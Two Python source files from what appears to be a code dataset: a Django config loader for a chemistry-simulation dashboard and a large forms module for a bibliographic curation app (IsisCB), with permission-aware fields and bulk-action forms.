content stringlengths 5 1.05M |
|---|
import json
from django.conf import settings
import os
from csv import reader
from mechanism.reactions import reaction_musica_names
from dashboard.save import initial_conditions_file_to_dictionary
config_path = os.path.join(settings.BASE_DIR, "dashboard/static/config")
def option_setup():
    """Load and return the simulation options config as a dict."""
    options_file = os.path.join(config_path, 'options.json')
    with open(options_file) as handle:
        return json.load(handle)
def ini_cond_setup():
    """Load and return the initial-conditions config as a dict."""
    initials_file = os.path.join(config_path, 'initials.json')
    with open(initials_file) as handle:
        return json.load(handle)
def display_evolves():
    """Map each evolving-conditions file in my_config.json to its header row.

    Returns a dict keyed by file name:
      * CSV/TXT files map to their first row (or ['EMPTY FILE'] if empty),
      * NetCDF files map to ['NETCDF FILE'].
    """
    with open(os.path.join(config_path, 'my_config.json')) as f:
        config = json.loads(f.read())
    evolving_conditions = config['evolving conditions']
    file_header_dict = {}  # filename -> header row of that file
    for name in evolving_conditions.keys():
        # NOTE(review): substring tests ('.csv' in name) also match names like
        # 'data.csv.bak'; preserved from the original behavior.
        if '.csv' in name or '.txt' in name:
            # FIX: reuse the module-level config_path instead of re-joining
            # settings.BASE_DIR inline (was duplicated, risking divergence).
            path = os.path.join(config_path, name)
            with open(path, 'r') as read_obj:
                list_of_rows = list(reader(read_obj))
            try:
                file_header_dict[name] = list_of_rows[0]
            except IndexError:
                file_header_dict[name] = ['EMPTY FILE']
        elif '.nc' in name:
            file_header_dict[name] = ['NETCDF FILE']
    return file_header_dict
|
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import str
from builtins import object
from django import forms
from django.http import QueryDict
from isisdata.models import *
from isisdata import export # This never gets old...
from isisdata import export_authority
from curation import actions
import rules
class CCRelationForm(forms.ModelForm):
    """Form for creating/editing citation-to-citation (CC) relations."""

    subject = forms.CharField(widget=forms.HiddenInput(), required=True)
    object = forms.CharField(widget=forms.HiddenInput(), required=True)

    # Populated dynamically in the rendered form.
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)

    # Relation-type codes.
    INCLUDES_CHAPTER = 'IC'
    INCLUDES_SERIES_ARTICLE = 'ISA'
    INCLUDES_CITATION_OBJECT = "ICO"
    REVIEWED_BY = 'RB'
    RESPONDS_TO = 'RE'
    ASSOCIATED_WITH = 'AS'

    TYPE_CHOICES = (
        (INCLUDES_CHAPTER, 'Includes Chapter'),
        (INCLUDES_SERIES_ARTICLE, 'Includes Series Article'),
        (INCLUDES_CITATION_OBJECT, 'Includes'),
        (ASSOCIATED_WITH, 'Is Associated With'),
        (REVIEWED_BY, 'Is Reviewed By')
    )
    type_controlled = forms.ChoiceField(choices=TYPE_CHOICES)

    def __init__(self, *args, **kwargs):
        super(CCRelationForm, self).__init__(*args, **kwargs)
        status_field = self.fields['record_status_value']
        if not self.is_bound and not status_field.initial:
            status_field.initial = CuratedMixin.ACTIVE

    def clean(self):
        super(CCRelationForm, self).clean()
        # The hidden char fields carry primary keys; resolve them to instances.
        for key in ('subject', 'object'):
            pk = self.cleaned_data.get(key, None)
            if pk:
                self.cleaned_data[key] = Citation.objects.get(pk=pk)

    class Meta:
        model = CCRelation
        fields = [
            'type_controlled', 'data_display_order', 'subject',
            'object', 'record_status_value', 'record_status_explanation',
            'administrator_notes', 'record_history',
        ]
        labels = {
            'administrator_notes': 'Staff notes'
        }
class ACRelationForm(forms.ModelForm):
    """Form for creating/editing authority-to-citation (AC) relations."""

    authority = forms.CharField(widget=forms.HiddenInput(), required=False)
    citation = forms.CharField(widget=forms.HiddenInput(), required=False)

    # Populated dynamically in the rendered form.
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
    type_controlled = forms.ChoiceField(choices=ACRelation.TYPE_CHOICES, required=False)
    confidence_measure = forms.TypedChoiceField(**{
        'choices': [
            (1.0, 'Certain/very likely'),
            (0.5, 'Likely'),
            (0.0, 'Unsure'),
        ],
        'coerce': float,
        'required': True,
    })

    class Meta(object):
        model = ACRelation
        fields = [
            'type_controlled',
            'name_for_display_in_citation', 'data_display_order',
            'confidence_measure', 'authority', 'citation',
            'record_status_value', 'record_status_explanation',
            'administrator_notes', 'record_history'
        ]
        labels = {
            'administrator_notes': 'Staff notes',
        }

    def __init__(self, *args, **kwargs):
        super(ACRelationForm, self).__init__(*args, **kwargs)
        status_field = self.fields['record_status_value']
        if not self.is_bound and not status_field.initial:
            status_field.initial = CuratedMixin.ACTIVE

    def clean(self):
        super(ACRelationForm, self).clean()
        # Resolve the hidden pk fields into model instances, or None if blank.
        for key, model_class in (('authority', Authority), ('citation', Citation)):
            pk = self.cleaned_data.get(key, None)
            self.cleaned_data[key] = model_class.objects.get(pk=pk) if pk else None
class AARelationForm(forms.ModelForm):
    """Form for creating/editing authority-to-authority (AA) relations."""

    authority_subject = forms.CharField(widget=forms.HiddenInput(), required=False)
    authority_object = forms.CharField(widget=forms.HiddenInput(), required=False)

    # Populated dynamically in the rendered form.
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
    type_controlled = forms.ChoiceField(choices=AARelation.TYPE_CHOICES, required=False)
    confidence_measure = forms.TypedChoiceField(**{
        'choices': [
            (1.0, 'Certain/very likely'),
            (0.5, 'Likely'),
            (0.0, 'Unsure'),
        ],
        'coerce': float,
        'required': False,
    })

    class Meta(object):
        model = AARelation
        fields = [
            'type_controlled', 'aar_type',
            'confidence_measure', 'subject', 'object',
            'record_status_value', 'record_status_explanation',
            'administrator_notes', 'record_history'
        ]
        labels = {
            'administrator_notes': 'Staff notes',
        }

    def __init__(self, *args, **kwargs):
        super(AARelationForm, self).__init__(*args, **kwargs)
        # subject/object are filled in clean() from the hidden authority_* fields.
        self.fields['subject'].required = False
        self.fields['object'].required = False
        if not self.is_bound:
            if not self.fields['record_status_value'].initial:
                self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
            if not self.fields['authority_subject'].initial and self.instance.subject:
                self.fields['authority_subject'].initial = self.instance.subject.id
            if not self.fields['authority_object'].initial and self.instance.object:
                self.fields['authority_object'].initial = self.instance.object.id

    def clean(self):
        super(AARelationForm, self).clean()
        if self.cleaned_data.get('aar_type', None):
            # BUG FIX: the original evaluated
            #   self.cleaned_data['type_controlled'] + aar_type.base_type
            # and discarded the result (a no-op). Derive type_controlled from
            # the selected AARelationType's base type instead.
            self.cleaned_data['type_controlled'] = self.cleaned_data.get('aar_type').base_type
        # Resolve the hidden pk fields into Authority instances (or None).
        authority_subject_id = self.cleaned_data.get('authority_subject', None)
        if authority_subject_id:
            self.cleaned_data['subject'] = Authority.objects.get(pk=authority_subject_id)
        else:
            self.cleaned_data['subject'] = None
        authority_object_id = self.cleaned_data.get('authority_object', None)
        if authority_object_id:
            self.cleaned_data['object'] = Authority.objects.get(pk=authority_object_id)
        else:
            self.cleaned_data['object'] = None
class ISODateValueForm(forms.ModelForm):
    """Form for editing an ISODateValue via a single free-text field."""

    value = forms.CharField()

    def __init__(self, *args, **kwargs):
        super(ISODateValueForm, self).__init__(*args, **kwargs)
        instance = kwargs.get('instance')
        if instance and not self.is_bound:
            # Pre-fill with the instance's canonical string representation.
            self.fields['value'].initial = instance.__unicode__()

    def clean_value(self):
        """Validate that the value parses as an ISO8601 date."""
        value = self.cleaned_data['value']
        try:
            ISODateValue.convert(value)
        except Exception:
            # FIX: narrowed from a bare ``except:`` so that system-exiting
            # exceptions (KeyboardInterrupt, SystemExit) are not swallowed.
            raise forms.ValidationError('Please enter an ISO8601-compliant date.')
        return value

    def save(self, *args, **kwargs):
        self.instance.value = self.cleaned_data.get('value')
        # BUG FIX: return the saved instance (ModelForm.save contract); the
        # original dropped it, so ``obj = form.save()`` yielded None.
        return super(ISODateValueForm, self).save(*args, **kwargs)

    class Meta(object):
        model = ISODateValue
        fields = []
class AuthorityValueForm(forms.ModelForm):
    """Form for editing an AuthorityValue: the value is an Authority id."""

    value = forms.CharField(label="Authority ID")
    authority_name = forms.CharField(label='Name of stored authority')

    def __init__(self, *args, **kwargs):
        super(AuthorityValueForm, self).__init__(*args, **kwargs)
        instance = kwargs.get('instance')
        if instance and not self.is_bound:
            # NOTE(review): this shows the AuthorityValue record's own pk,
            # while authority_name shows instance.value.name — confirm whether
            # instance.value.pk was intended here.
            self.fields['value'].initial = instance.pk
            self.fields['authority_name'].initial = instance.value.name
            self.fields['authority_name'].widget.attrs['readonly'] = True

    def clean_value(self):
        """Resolve the submitted id into an Authority instance."""
        value = self.cleaned_data['value']
        try:
            value = Authority.objects.get(id=value)
        except Exception:
            # FIX: narrowed from a bare ``except:`` so that system-exiting
            # exceptions are not swallowed.
            raise forms.ValidationError('Authority record does not exist.')
        return value

    def save(self, *args, **kwargs):
        self.instance.value = self.cleaned_data.get('value')
        # BUG FIX: return the saved instance (ModelForm.save contract).
        return super(AuthorityValueForm, self).save(*args, **kwargs)

    class Meta(object):
        model = AuthorityValue
        fields = ['value']
class CitationValueForm(forms.ModelForm):
    """Form for editing a CitationValue: the value is a Citation id."""

    value = forms.CharField(label="Citation ID", widget=forms.TextInput(attrs={'data-type':'citation_id'}))
    citation_name = forms.CharField(label='Name of stored citation', widget=forms.TextInput(attrs={'readonly': True}))

    def __init__(self, *args, **kwargs):
        super(CitationValueForm, self).__init__(*args, **kwargs)
        instance = kwargs.get('instance')
        if instance and not self.is_bound:
            # NOTE(review): shows the CitationValue record's own pk while
            # citation_name shows instance.value.title_for_display — confirm
            # whether instance.value.pk was intended.
            self.fields['value'].initial = instance.pk
            self.fields['citation_name'].initial = instance.value.title_for_display

    def clean_value(self):
        """Resolve the submitted id into a Citation instance."""
        value = self.cleaned_data['value']
        try:
            value = Citation.objects.get(id=value)
        except Exception:
            # FIX: narrowed from a bare ``except:`` so that system-exiting
            # exceptions are not swallowed.
            raise forms.ValidationError('Citation record does not exist.')
        return value

    def save(self, *args, **kwargs):
        self.instance.value = self.cleaned_data.get('value')
        # BUG FIX: return the saved instance (ModelForm.save contract).
        return super(CitationValueForm, self).save(*args, **kwargs)

    class Meta(object):
        model = CitationValue
        fields = ['value']
class PartDetailsForm(forms.ModelForm):
    """Form for a citation's pagination/volume/issue details.

    Field-level access is governed by the ``rules`` predicates
    ``can_update_citation_field`` / ``can_view_citation_field`` applied to the
    'part_details' field group of the given citation.
    """
    extent_note = forms.CharField(widget=forms.widgets.Textarea({'rows': '1'}), required=False)

    def __init__(self, user, citation_id=None, *args, **kwargs):
        super(PartDetailsForm, self).__init__( *args, **kwargs)
        self.user = user
        self.citation_id = citation_id
        # Placeholder text for each begin/end/free-text triplet.
        self.fields['volume_begin'].widget.attrs['placeholder'] = "Begin #"
        self.fields['volume_end'].widget.attrs['placeholder'] = "End #"
        self.fields['volume_free_text'].widget.attrs['placeholder'] = "Volume"
        self.fields['issue_begin'].widget.attrs['placeholder'] = "Begin #"
        self.fields['issue_end'].widget.attrs['placeholder'] = "End #"
        self.fields['issue_free_text'].widget.attrs['placeholder'] = "Issue"
        self.fields['page_begin'].widget.attrs['placeholder'] = "Begin #"
        self.fields['page_end'].widget.attrs['placeholder'] = "End #"
        self.fields['pages_free_text'].widget.attrs['placeholder'] = "Pages"
        self.fields['extent'].widget.attrs['placeholder'] = "Extent"
        self.fields['extent_note'].widget.attrs['placeholder'] = "Extent note"
        if citation_id:
            # Restrict all fields at once based on the 'part_details' group.
            can_update = rules.test_rule('can_update_citation_field', user, ('part_details', citation_id))
            can_view = rules.test_rule('can_view_citation_field', user, ('part_details', citation_id))
            set_field_access(can_update, can_view, self.fields)

    class Meta(object):
        model = PartDetails
        exclude =['volume', 'sort_order']

    def _get_validation_exclusions(self):
        """Exclude every field from validation when the user lacks update or
        view access to the 'part_details' group (the rules are group-wide, so
        the per-field loop applies the same verdict to all fields)."""
        exclude = super(PartDetailsForm, self)._get_validation_exclusions()
        # remove fields that user isn't allowed to modify
        if self.citation_id:
            can_update = rules.test_rule('can_update_citation_field', self.user, ('part_details', self.citation_id))
            can_view = rules.test_rule('can_view_citation_field', self.user, ('part_details', self.citation_id))
            for field in self.fields:
                if not can_update or not can_view:
                    exclude.append(field)
        return exclude
def set_field_access(can_update, can_view, fields):
    """Apply read-only/no-view restrictions to every field in ``fields``.

    Fields are made read-only when the user cannot update them; fields the
    user cannot view are replaced with a masked, read-only input.
    """
    for name in fields:
        if not can_update:
            fields[name].widget.attrs['readonly'] = True
        if not can_view:
            masked = forms.CharField(widget=NoViewInput())
            masked.widget.attrs['readonly'] = True
            fields[name] = masked
class StubCheckboxInput(forms.widgets.CheckboxInput):
    """Checkbox that renders as checked when the bound value equals
    Citation.STUB_RECORD."""
    def __init__(self, attrs=None, check_test=None):
        # Any caller-supplied check_test is intentionally ignored; stub status
        # is always determined by comparison against Citation.STUB_RECORD.
        is_stub = lambda value: value == Citation.STUB_RECORD
        super().__init__(attrs, is_stub)
class CitationForm(forms.ModelForm):
    """Main form for creating/editing Citation records.

    Per-field access is governed by the ``rules`` predicates
    ``can_update_citation_field`` / ``can_view_citation_field``; restricted
    fields are rendered read-only/disabled and excluded from validation.
    """
    abstract = forms.CharField(widget=forms.widgets.Textarea({'rows': '7'}), required=False)
    complete_citation = forms.CharField(widget=forms.widgets.Textarea({'rows': '7'}), required=False)
    description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    record_history = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    additional_titles = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
    edition_details = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
    physical_details = forms.CharField(widget=forms.widgets.Textarea({'rows': '2'}), required=False)
    language = forms.ModelMultipleChoiceField(queryset=Language.objects.all(), required=False)
    belongs_to = forms.ModelChoiceField(queryset=Dataset.objects.all(), label='Dataset', required=False)
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
    administrator_notes = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False, label="Staff notes")
    title = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    subtype = forms.ModelChoiceField(queryset=CitationSubtype.objects.all(), label='Subtype', required=False)
    stub_record_status = forms.BooleanField(label='Stub', widget=StubCheckboxInput(), required=False)

    class Meta(object):
        model = Citation
        fields = [
            'type_controlled', 'title', 'description', 'edition_details',
            'physical_details', 'abstract', 'additional_titles',
            'book_series', 'record_status_value', 'record_status_explanation',
            'belongs_to', 'administrator_notes', 'record_history', 'subtype',
            'complete_citation', 'stub_record_status'
        ]
        labels = {
            'belongs_to': 'Dataset',
            'administrator_notes': 'Staff notes',
            'complete_citation': 'Stub text'
        }

    def __init__(self, user, *args, **kwargs):
        super(CitationForm, self).__init__( *args, **kwargs)
        self.user = user
        if not self.is_bound:
            if not self.fields['record_status_value'].initial:
                self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
        # disable fields user doesn't have access to
        if self.instance.pk:
            self.fields['title'].widget.attrs['placeholder'] = "No title"
            # The record type cannot be changed once created.
            self.fields['type_controlled'].widget = forms.widgets.HiddenInput()
            # book_series does not apply to these citation types.
            if self.instance.type_controlled in [Citation.REVIEW, Citation.CHAPTER, Citation.ARTICLE, Citation.ESSAY_REVIEW]:
                self.fields['book_series'].widget = forms.widgets.HiddenInput()
            if self.instance.type_controlled in [Citation.THESIS]:
                self.fields['book_series'].widget = forms.widgets.HiddenInput()
            # Only offer subtypes that match this citation's type.
            self.fields['subtype'].queryset = CitationSubtype.objects.filter(related_citation_type=self.instance.type_controlled)
            for field in self.fields:
                can_update = rules.test_rule('can_update_citation_field', user, (field, self.instance.pk))
                if not can_update:
                    self.fields[field].widget.attrs['readonly'] = True
                    self.fields[field].widget.attrs['disabled'] = True
                can_view = rules.test_rule('can_view_citation_field', user, (field, self.instance.pk))
                if not can_view:
                    # Replace the field entirely so the value is never rendered.
                    self.fields[field] = forms.CharField(widget=NoViewInput())
                    self.fields[field].widget.attrs['readonly'] = True
                    self.fields[field].widget.attrs['disabled'] = True

    def clean(self):
        super(CitationForm, self).clean()
        # Map the boolean checkbox onto the model's stored code (or None).
        stub_record_status = self.cleaned_data.get('stub_record_status', False)
        if stub_record_status:
            self.cleaned_data['stub_record_status'] = Citation.STUB_RECORD
        else:
            self.cleaned_data['stub_record_status'] = None

    def _get_validation_exclusions(self):
        """Exclude from validation any field the user may not update or view."""
        exclude = super(CitationForm, self)._get_validation_exclusions()
        # remove fields that user isn't allowed to modify
        if self.instance.pk:
            for field in self.fields:
                can_update = rules.test_rule('can_update_citation_field', self.user, (field, self.instance.pk))
                can_view = rules.test_rule('can_view_citation_field', self.user, (field, self.instance.pk))
                if not can_update or not can_view:
                    exclude.append(field)
        return exclude
class LinkedDataForm(forms.ModelForm):
    """Form for creating/editing LinkedData records."""

    class Meta(object):
        model = LinkedData
        fields = [
            'universal_resource_name', 'resource_name', 'url',
            'type_controlled', 'record_status_value',
            'record_status_explanation', 'administrator_notes',
            'record_history'
        ]
        labels = {
            'universal_resource_name': 'URN (link to authority)'
        }

    def __init__(self, *args, **kwargs):
        super(LinkedDataForm, self).__init__(*args, **kwargs)
        if not self.is_bound:
            if not self.fields['record_status_value'].initial:
                self.fields['record_status_value'].initial = CuratedMixin.ACTIVE

    def save(self, *args, **kwargs):
        # BUG FIX: return the saved instance (ModelForm.save contract); the
        # original dropped it, so ``obj = form.save()`` yielded None. This also
        # matches AttributeForm.save in this module.
        return super(LinkedDataForm, self).save(*args, **kwargs)
class NoViewInput(forms.TextInput):
    """Text input that masks its value for users lacking view permission."""
    def render(self, name, value, attrs=None):
        # Discard the real value and render a fixed permission notice instead.
        masked = "You do not have sufficient permissions to view this field."
        return super(NoViewInput, self).render(name, masked, attrs)
class AuthorityForm(forms.ModelForm):
    """Main form for creating/editing Authority records.

    Per-field access is governed by the ``rules`` predicates
    ``can_update_authority_field`` / ``can_view_authority_field``.
    """
    description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES, required=False)
    redirect_to = forms.CharField(widget=forms.HiddenInput(), required = False)
    record_history = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    belongs_to = forms.ModelChoiceField(queryset=Dataset.objects.all(), label='Dataset', required=False)

    class Meta(object):
        model = Authority
        fields = [
            'type_controlled', 'name', 'description', 'classification_system',
            'classification_code', 'classification_hierarchy',
            'record_status_value', 'record_status_explanation', 'redirect_to',
            'administrator_notes', 'record_history', 'belongs_to'
        ]
        labels = {
            'belongs_to': 'Dataset',
            'administrator_notes': 'Staff notes',
        }

    def __init__(self, user, *args, **kwargs):
        super(AuthorityForm, self).__init__(*args, **kwargs)
        if not self.is_bound:
            if not self.fields['record_status_value'].initial:
                self.fields['record_status_value'].initial = CuratedMixin.ACTIVE
        self.user = user
        # disable fields user doesn't have access to
        if self.instance.pk:
            for field in self.fields:
                can_update = rules.test_rule('can_update_authority_field', user, (field, self.instance.pk))
                if not can_update:
                    self.fields[field].widget.attrs['readonly'] = True
                can_view = rules.test_rule('can_view_authority_field', user, (field, self.instance.pk))
                if not can_view:
                    # Replace the field entirely so the value is never rendered.
                    self.fields[field] = forms.CharField(widget=NoViewInput())
                    self.fields[field].widget.attrs['readonly'] = True

    def clean(self):
        super(AuthorityForm, self).clean()
        # The hidden redirect_to field carries a pk; resolve it (or None).
        authority_id = self.cleaned_data['redirect_to']
        if authority_id:
            self.cleaned_data['redirect_to'] = Authority.objects.get(pk=authority_id)
        else:
            self.cleaned_data['redirect_to'] = None

    def _get_validation_exclusions(self):
        """Exclude from validation any field the user may not update or view."""
        exclude = super(AuthorityForm, self)._get_validation_exclusions()
        # remove fields that user isn't allowed to modify
        if self.instance.pk:
            for field in self.fields:
                can_update = rules.test_rule('can_update_authority_field', self.user, (field, self.instance.pk))
                can_view = rules.test_rule('can_view_authority_field', self.user, (field, self.instance.pk))
                if not can_update or not can_view:
                    exclude.append(field)
        return exclude
class CitationTrackingForm(forms.ModelForm):
    """Form for recording a tracking entry against a citation."""

    # Tracking-state codes.
    HSTM_UPLOAD = 'HS'
    PRINTED = 'PT'
    AUTHORIZED = 'AU'
    PROOFED = 'PD'
    FULLY_ENTERED = 'FU'
    BULK_DATA = 'BD'

    TYPE_CHOICES = (
        (HSTM_UPLOAD, 'HSTM Upload'),
        (PRINTED, 'Printed'),
        (AUTHORIZED, 'Authorized'),
        (PROOFED, 'Proofed'),
        (FULLY_ENTERED, 'Fully Entered'),
        (BULK_DATA, 'Bulk Data Update')
    )

    type_controlled = forms.ChoiceField(required=True, choices=TYPE_CHOICES)

    class Meta(object):
        model = Tracking
        fields = [
            'tracking_info', 'notes', 'type_controlled'
        ]
class AuthorityTrackingForm(forms.ModelForm):
    """Form for recording a tracking entry against an authority."""

    # Tracking-state codes (kept in sync with CitationTrackingForm).
    HSTM_UPLOAD = 'HS'
    PRINTED = 'PT'
    AUTHORIZED = 'AU'
    PROOFED = 'PD'
    FULLY_ENTERED = 'FU'
    BULK_DATA = 'BD'

    TYPE_CHOICES = (
        (HSTM_UPLOAD, 'HSTM Upload'),
        (PRINTED, 'Printed'),
        (AUTHORIZED, 'Authorized'),
        (PROOFED, 'Proofed'),
        (FULLY_ENTERED, 'Fully Entered'),
        (BULK_DATA, 'Bulk Data Update')
    )

    type_controlled = forms.ChoiceField(required=True, choices=TYPE_CHOICES)

    class Meta(object):
        model = AuthorityTracking
        fields = [
            'tracking_info', 'notes', 'type_controlled'
        ]
class PersonForm(forms.ModelForm):
    """Form for the person-specific name fields of an Authority."""

    description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)

    def __init__(self, user, authority_id, *args, **kwargs):
        super(PersonForm, self).__init__(*args, **kwargs)
        self.user = user
        self.authority_id = authority_id
        if authority_id:
            # Access is decided once for the whole 'person' field group.
            can_update = rules.test_rule('can_update_authority_field', user, ('person', authority_id))
            can_view = rules.test_rule('can_view_authority_field', user, ('person', authority_id))
            set_field_access(can_update, can_view, self.fields)

    class Meta(object):
        model = Person
        fields = [
            'personal_name_last', 'personal_name_first', 'personal_name_suffix',
            'personal_name_preferred',
        ]

    def _get_validation_exclusions(self):
        """Exclude all fields from validation when the user lacks update or
        view access to the 'person' field group."""
        exclude = super(PersonForm, self)._get_validation_exclusions()
        if self.authority_id:
            can_update = rules.test_rule('can_update_authority_field', self.user, ('person', self.authority_id))
            can_view = rules.test_rule('can_view_authority_field', self.user, ('person', self.authority_id))
            if not (can_update and can_view):
                for field in self.fields:
                    exclude.append(field)
        return exclude
class RoleForm(forms.ModelForm):
    """Form for creating/editing an IsisCB role."""

    class Meta(object):
        model = IsisCBRole
        fields = [
            'name', 'description',
        ]
class DatasetRuleForm(forms.ModelForm):
    """Form for a dataset-scoped access rule."""

    dataset = forms.ChoiceField(required=False)

    def __init__(self, *args, **kwargs):
        super(DatasetRuleForm, self).__init__(*args, **kwargs)
        # FIX: use a list instead of a set so the choice ordering is
        # deterministic, with the "No Dataset" placeholder first.
        choices = [(None, "No Dataset")]
        choices.extend((ds.pk, ds.name) for ds in Dataset.objects.all())
        self.fields['dataset'].choices = choices

    def clean_dataset(self):
        """Normalize the empty-string choice to None.

        BUG FIX: this hook was named ``clean_field``, which Django never
        calls — per-field cleaning methods must be named ``clean_<fieldname>``,
        so the empty-string-to-None conversion never ran.
        """
        data = self.cleaned_data['dataset']
        if data == '':
            data = None
        return data

    class Meta(object):
        model = DatasetRule
        fields = [
            'dataset', 'role'
        ]
class AddRoleForm(forms.Form):
    """Form for assigning an existing role to a user."""

    role = forms.ChoiceField(required=True)

    def __init__(self, *args, **kwargs):
        super(AddRoleForm, self).__init__(*args, **kwargs)
        # Offer every defined role as (pk, name).
        self.fields['role'].choices = [
            (role.pk, role.name) for role in IsisCBRole.objects.all()
        ]
class CRUDRuleForm(forms.ModelForm):
    """Form for a create/read/update/delete permission rule."""

    class Meta(object):
        model = CRUDRule
        fields = [
            'crud_action'
        ]
        labels = {
            'crud_action': 'Allowed Action',
        }
class FieldRuleCitationForm(forms.ModelForm):
    """Form for a field-level access rule on Citation fields."""

    field_name = forms.ChoiceField(required=True)

    def __init__(self, *args, **kwargs):
        super(FieldRuleCitationForm, self).__init__(*args, **kwargs)
        # Offer every Citation model field name, alphabetically.
        names = sorted(field.name for field in Citation._meta.get_fields())
        self.fields['field_name'].choices = [(name, name) for name in names]

    class Meta(object):
        model = FieldRule
        fields = [
            'field_action', 'field_name',
        ]
class FieldRuleAuthorityForm(forms.ModelForm):
    """Form for a field-level access rule on Authority fields."""

    field_name = forms.ChoiceField(required=True)

    def __init__(self, *args, **kwargs):
        super(FieldRuleAuthorityForm, self).__init__(*args, **kwargs)
        # Offer every Authority model field name, alphabetically.
        names = sorted(field.name for field in Authority._meta.get_fields())
        self.fields['field_name'].choices = [(name, name) for name in names]

    class Meta(object):
        model = FieldRule
        fields = [
            'field_action', 'field_name',
        ]
class UserModuleRuleForm(forms.ModelForm):
    """Form for a module-level access rule."""

    class Meta(object):
        model = UserModuleRule
        fields = [
            'module_action',
        ]
class AttributeForm(forms.ModelForm):
    """Form for creating/editing Attribute records."""

    description = forms.CharField(widget=forms.widgets.Textarea({'rows': '3'}), required=False)
    type_controlled = forms.ModelChoiceField(queryset=AttributeType.objects.all(), required=False)
    record_status_value = forms.ChoiceField(choices=CuratedMixin.STATUS_CHOICES)

    class Meta(object):
        model = Attribute
        fields = [
            'type_controlled',
            'description',
            'value_freeform',
            'record_status_value',
            'record_status_explanation',
            'record_history'
        ]

    def __init__(self, *args, **kwargs):
        super(AttributeForm, self).__init__(*args, **kwargs)
        status_field = self.fields['record_status_value']
        if not self.is_bound and not status_field.initial:
            status_field.initial = CuratedMixin.ACTIVE

    def save(self, *args, **kwargs):
        # Keep the stored type as the field's initial value for existing
        # attributes before delegating to ModelForm.save.
        if self.instance.id:
            self.fields['type_controlled'].initial = self.instance.type_controlled
        return super(AttributeForm, self).save(*args, **kwargs)
class BulkActionForm(forms.Form):
    """Base form for bulk curation actions.

    Concrete subclasses are generated by ``bulk_action_form_factory``, which
    attaches an ``action`` MultipleChoiceField plus one value field per action
    class (named after the class) and extra fields named
    ``<ActionName>__<param>``.
    """
    def apply(self, user, filter_params_raw, extra=None):
        """Instantiate and run each selected action; return the list of task
        results (one per selected action)."""
        selected_actions = self.cleaned_data.get('action')
        tasks = []
        for action_name in selected_actions:
            action_value = self.cleaned_data.get(action_name)
            # Gather this action's '<ActionName>__<param>' entries as
            # {'<param>': value} keyword arguments.
            extra_data = {
                k.split('__')[1]: v for k, v in list(self.cleaned_data.items())
                if k.startswith(action_name) and not k == action_name and '__' in k
            }
            if extra:
                extra_data.update(extra)
            # Load and instantiate the corresponding action class.
            action = getattr(actions, action_name)()    # Object is callable.
            tasks.append(action.apply(user, filter_params_raw, action_value, **extra_data))
        return tasks
# Emulates django's modelform_factory
def bulk_action_form_factory(form=BulkActionForm, **kwargs):
    """Build a BulkActionForm subclass with one value field per available
    action, any per-action extra fields, an ``action`` multi-choice field,
    and a hidden ``filters`` field.

    Keyword args:
        queryset: passed to each action class's ``get_extra_data`` hook.
        object_type: 'CITATION' (default) or 'AUTHORITY'; selects the action set.
    """
    attrs = {} # For the form's Meta inner class.
    # For the Media inner class.
    media_attrs = {'js': ('curation/js/bulkaction.js', )}
    queryset = kwargs.pop('queryset', None)
    object_type = kwargs.pop('object_type', 'CITATION')
    # Inherit the base form's Meta if it has one.
    parent = (object,)
    if hasattr(form, 'Meta'):
        parent = (form.Meta, object)
    Meta = type(str('Meta'), parent, attrs)
    form_class_attrs = {'Meta': Meta}
    action_choices = []
    extra_data = {}
    # hack until we also make tracking status work
    avail_actions = actions.AVAILABLE_ACTIONS_AUTHORITY if object_type == 'AUTHORITY' else actions.AVAILABLE_ACTIONS
    for action_class in avail_actions:
        # Actions may contribute extra JS assets and precomputed data.
        if hasattr(action_class, 'extra_js'):
            media_attrs['js'] = tuple(list(media_attrs['js']) + [action_class.extra_js])
        if hasattr(action_class, 'get_extra_data'):
            extra_data[action_class.__name__] = action_class.get_extra_data(queryset=queryset)
        action = action_class()
        action_choices.append((action_class.__name__, action.label))
        # One value field per action, keyed by the action class name.
        form_class_attrs[action_class.__name__] = action.get_value_field(required=False)
        extras = action.get_extra_fields()
        if extras:
            # Extra fields are namespaced as '<ActionName>__<field>'.
            form_class_attrs.update({'%s__%s' % (action_class.__name__, name): field for name, field in extras})
    form_class_attrs['Media'] = type(str('Media'), (object,), media_attrs)
    form_class_attrs['extra_data'] = extra_data
    form_class_attrs['action'] = forms.MultipleChoiceField(choices=action_choices)
    form_class_attrs['filters'] = forms.CharField(widget=forms.widgets.HiddenInput())
    return type(form)('BulkChangeForm', (form,), form_class_attrs)
class CitationCollectionForm(forms.ModelForm):
    """Form for creating/editing a collection of citations."""

    filters = forms.CharField(widget=forms.widgets.HiddenInput())

    class Meta(object):
        model = CitationCollection
        exclude = ('created', 'createdBy', 'citations')
class AuthorityCollectionForm(forms.ModelForm):
    """Form for creating/editing a collection of authorities."""

    filters = forms.CharField(widget=forms.widgets.HiddenInput())

    class Meta(object):
        model = AuthorityCollection
        exclude = ('created', 'createdBy', 'authorities')
class AARSetForm(forms.ModelForm):
    """Form for creating/editing an AARelation set."""

    class Meta(object):
        model = AARSet
        fields = ['name', 'description']
class AARelationTypeForm(forms.ModelForm):
    """Form for creating/editing an AARelation type."""

    class Meta(object):
        model = AARelationType
        fields = ['name', 'description', 'relation_type_controlled', 'base_type', 'aarset']
class SelectCitationCollectionForm(forms.Form):
    """Form for picking an existing citation collection."""

    collection = forms.ModelChoiceField(queryset=CitationCollection.objects.all())
    filters = forms.CharField(widget=forms.widgets.HiddenInput())
